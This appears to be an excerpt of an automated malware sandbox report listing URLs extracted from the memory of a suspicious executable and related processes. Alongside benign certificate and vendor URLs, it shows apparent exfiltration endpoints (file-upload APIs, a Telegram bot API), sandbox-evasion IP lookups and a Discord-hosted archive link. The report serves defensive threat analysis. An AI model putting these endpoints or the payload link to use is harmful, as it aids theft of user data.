              Source: El9HaBFrFM.exe, 00000000.00000003.1684986417.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: El9HaBFrFM.exe, 00000000.00000003.1688964934.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684578241.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000002.2265625565.00000230D3DCC000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684135354.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686506375.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1688035385.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1687186974.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684830181.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684252973.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1689202299.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686972713.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684758142.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684507062.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684903916.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684380526.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686891261.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684986417.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
              Source: El9HaBFrFM.exe, 00000000.00000003.1687680528.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
              Source: El9HaBFrFM.exe, 00000001.00000003.1697781909.0000025067F12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);
              Source: svchost.exe, 0000003D.00000002.2951027713.000001C1A86EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/
              Source: svchost.exe, 0000003D.00000003.1851285401.000001C1A84F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
              Source: svchost.exe, 0000003D.00000003.1851285401.000001C1A84F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
              Source: svchost.exe, 0000003D.00000003.1851285401.000001C1A84F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
              Source: svchost.exe, 0000003D.00000003.1851285401.000001C1A84F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
              Source: svchost.exe, 0000003D.00000003.1851285401.000001C1A84F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
              Source: svchost.exe, 0000003D.00000003.1851285401.000001C1A84F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
              Source: svchost.exe, 0000003D.00000003.1851285401.000001C1A852D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
              Source: svchost.exe, 0000003D.00000002.2950445995.000001C1A862E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000003D.00000002.2949088408.000001C1A3902000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000003D.00000002.2950366204.000001C1A8600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000003D.00000002.2950867475.000001C1A86C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/e6xlmsu5i2bokri3w4cyuhv4nq_2024.8.10.0/go
              Source: svchost.exe, 0000003D.00000002.2950602383.000001C1A86AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com:80
              Source: svchost.exe, 0000003D.00000002.2950602383.000001C1A8661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com:80/edgedl/release2/chrome_component/e6xlmsu5i2bokri3w4cyuhv4nq_2024.8.10.0
              Source: svchost.exe, 0000003D.00000003.1851285401.000001C1A8571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
              Source: El9HaBFrFM.exe, 00000001.00000003.1787479378.00000250684C6000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2250100607.00000250684C6000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1711133484.000002506853A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/
              Source: El9HaBFrFM.exe, 00000001.00000003.1787479378.00000250684C6000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2250100607.00000250684C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/mail/
              Source: El9HaBFrFM.exe, 00000001.00000002.2249310602.0000025067E40000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1787479378.00000250684C6000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2250100607.00000250684C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
              Source: El9HaBFrFM.exe, 00000001.00000002.2249585620.0000025068140000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545
              Source: El9HaBFrFM.exe, 00000001.00000003.1703337610.0000025067FF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545r
              Source: El9HaBFrFM.exe, 00000001.00000002.2249585620.0000025068140000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
              Source: El9HaBFrFM.exe, 00000001.00000003.1703337610.0000025067FF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hostingr~
              Source: El9HaBFrFM.exe, 00000001.00000003.1703337610.0000025067FF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hostingr~r
              Source: powershell.exe, 00000006.00000002.1957704599.0000021ED7999000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.1947586190.0000026CB98F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2087591668.0000026CC8143000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2087591668.0000026CC8010000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: El9HaBFrFM.exe, 00000000.00000003.1687680528.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
              Source: El9HaBFrFM.exe, 00000000.00000003.1688964934.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684578241.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000002.2265625565.00000230D3DCC000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684135354.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686506375.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1688035385.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1687186974.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684830181.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684252973.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1689202299.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686972713.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684758142.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684507062.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684903916.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684380526.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686891261.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684986417.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: El9HaBFrFM.exe, 00000000.00000003.1688964934.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684578241.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684135354.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686506375.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1688035385.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1687186974.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684830181.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684252973.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1689202299.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686972713.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1688035385.00000230D3DCC000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684758142.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684507062.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684758142.00000230D3DCC000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684903916.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684380526.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686891261.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684986417.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
              Source: El9HaBFrFM.exe, 00000000.00000003.1688964934.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684578241.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684135354.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686506375.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1688035385.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1687186974.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684830181.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684252973.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1689202299.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686972713.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1688035385.00000230D3DCC000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684758142.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684507062.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684758142.00000230D3DCC000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684903916.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684380526.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686891261.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684986417.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
              Source: El9HaBFrFM.exe, 00000000.00000003.1688964934.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684578241.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684135354.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686506375.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1688035385.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1687186974.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684830181.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684252973.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1689202299.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686972713.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684758142.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684507062.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684903916.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684380526.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686891261.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684986417.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
              Source: El9HaBFrFM.exe, 00000000.00000003.1687680528.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
              Source: El9HaBFrFM.exe, 00000000.00000003.1687680528.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
              Source: powershell.exe, 0000002E.00000002.1947586190.0000026CB9898000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: El9HaBFrFM.exe, 00000000.00000003.1687917676.00000230D3DCC000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1687680528.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcb.com/universal-root.crl0
              Source: El9HaBFrFM.exe, 00000000.00000003.1687917676.00000230D3DCC000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1687680528.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcd.com06
              Source: powershell.exe, 00000006.00000002.1890826946.0000021EC7B49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: powershell.exe, 00000006.00000002.1890826946.0000021EC7921000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.1947586190.0000026CB7F81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000006.00000002.1890826946.0000021EC7B49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
              Source: El9HaBFrFM.exe, 00000001.00000002.2251098631.0000025068940000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
              Source: El9HaBFrFM.exe, 00000001.00000003.1710988652.0000025068B51000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1711527664.0000025069462000.00000004.00000020.00020000.00000000.sdmp, bound.exe, 00000012.00000000.1715370001.0000026C525E2000.00000002.00000001.01000000.00000016.sdmpString found in binary or memory: http://trksyln.net/tgmacro/data/VersionInfo.jsondhttp://trksyln.net/tgmacro/data/ShadyWebSites.json
              Source: El9HaBFrFM.exe, 00000000.00000003.1687917676.00000230D3DCC000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1687680528.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
              Source: El9HaBFrFM.exe, 00000000.00000003.1687680528.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
              Source: El9HaBFrFM.exe, 00000000.00000003.1687917676.00000230D3DCC000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1687680528.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
              Source: El9HaBFrFM.exe, 00000000.00000003.1687680528.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
              Source: El9HaBFrFM.exe, 00000000.00000003.1687680528.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
              Source: El9HaBFrFM.exe, 00000000.00000003.1687917676.00000230D3DCC000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1687680528.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
              Source: powershell.exe, 0000002E.00000002.1947586190.0000026CB95D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: powershell.exe, 0000002E.00000002.1947586190.0000026CB9898000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: El9HaBFrFM.exe, 00000000.00000003.1688964934.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684578241.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000002.2265625565.00000230D3DCC000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684135354.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686506375.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1688035385.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1687186974.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684830181.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684252973.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1689202299.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686972713.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684758142.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684507062.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684903916.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684380526.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1686891261.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000000.00000003.1684986417.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
              Source: El9HaBFrFM.exe, 00000001.00000003.1894005943.0000025068450000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2249686549.0000025068450000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
              Source: powershell.exe, 00000006.00000002.1984874757.0000021EDFF70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.coEu
              Source: El9HaBFrFM.exe, 00000001.00000003.1710988652.0000025068B51000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1711527664.0000025069462000.00000004.00000020.00020000.00000000.sdmp, bound.exe, 00000012.00000000.1715370001.0000026C525E2000.00000002.00000001.01000000.00000016.sdmp, bound.exe, 00000012.00000002.1793626562.0000026C529D7000.00000004.00000020.00020000.00000000.sdmp, bound.exe, 00000012.00000002.1794399266.0000026C529FC000.00000004.00000020.00020000.00000000.sdmp, bound.exe, 00000012.00000002.1798344120.0000026C6CDF0000.00000004.00000020.00020000.00000000.sdmp, bound.exe, 00000012.00000002.1797031236.0000026C54381000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.trksyln.net/tgmacro/download
              Source: bound.exe, 00000012.00000002.1798344120.0000026C6CDF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.trksyln.net/tgmacro/download1
              Source: bound.exe, 00000012.00000002.1794399266.0000026C529FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.trksyln.net/tgmacro/download9
              Source: bound.exe, 00000012.00000002.1798344120.0000026C6CDF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.trksyln.net/tgmacro/downloadE
              Source: bound.exe, 00000012.00000002.1793626562.0000026C5297C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.trksyln.net/tgmacro/downloadG
              Source: bound.exe, 00000012.00000002.1793626562.0000026C529D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.trksyln.net/tgmacro/downloadQ
              Source: bound.exe, 00000012.00000002.1798344120.0000026C6CDF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.trksyln.net/tgmacro/downloadl
              Source: bound.exe, 00000012.00000002.1793626562.0000026C529D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.trksyln.net/tgmacro/downloadses
              Source: bound.exe, 00000012.00000002.1798344120.0000026C6CDF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.trksyln.net/tgmacro/downloadu
              Source: El9HaBFrFM.exe, 00000001.00000003.1710988652.0000025068B51000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1711527664.0000025069462000.00000004.00000020.00020000.00000000.sdmp, bound.exe, 00000012.00000000.1715370001.0000026C525E2000.00000002.00000001.01000000.00000016.sdmpString found in binary or memory: http://www.trksyln.netYhttps://trksyln.net/tgmacro/HowToUse/Actionsahttps://trksyln.net/tgmacro/HowT
              Source: El9HaBFrFM.exe, 00000001.00000002.2252567268.0000025068E08000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2254155732.0000025069870000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://MD8.mozilla.org/1/m
              Source: El9HaBFrFM.exe, 00000001.00000002.2251875096.0000025068C36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: El9HaBFrFM.exe, 00000001.00000002.2254155732.00000250698B4000.00000004.00001000.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2252567268.0000025068E04000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2252567268.0000025068DF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.bellmedia.c
              Source: powershell.exe, 00000006.00000002.1890826946.0000021EC7921000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.1947586190.0000026CB7F81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: El9HaBFrFM.exe, 00000001.00000002.2251250349.0000025068AFC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://allegro.pl/
              Source: El9HaBFrFM.exe, 00000001.00000002.2249585620.0000025068140000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.anonfiles.com/upload
              Source: El9HaBFrFM.exe, 00000001.00000003.1703337610.0000025067FF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.anonfiles.com/uploadr#
              Source: El9HaBFrFM.exe, 00000001.00000002.2249585620.0000025068140000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServer
              Source: El9HaBFrFM.exe, 00000001.00000003.1703337610.0000025067FF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServerr~
              Source: El9HaBFrFM.exe, 00000001.00000003.1703337610.0000025067FF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServerr~r
              Source: El9HaBFrFM.exe, 00000001.00000003.1882939559.0000025068C5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.stripe.com/v
              Source: El9HaBFrFM.exe, 00000001.00000002.2249585620.0000025068140000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
              Source: El9HaBFrFM.exe, 00000001.00000002.2251250349.0000025068B10000.00000004.00001000.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2251250349.0000025068AC4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mo
              Source: El9HaBFrFM.exe, 00000001.00000003.2243032085.0000025069320000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2254069352.0000025069320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/1277354137243353152/1301611639166078986/Blank-user.rar?ex=67
              Source: El9HaBFrFM.exe, 00000001.00000002.2251875096.0000025068C36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: El9HaBFrFM.exe, 00000001.00000002.2251875096.0000025068C36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: El9HaBFrFM.exe, 00000001.00000002.2251875096.0000025068C36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: powershell.exe, 0000002E.00000002.2087591668.0000026CC8010000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
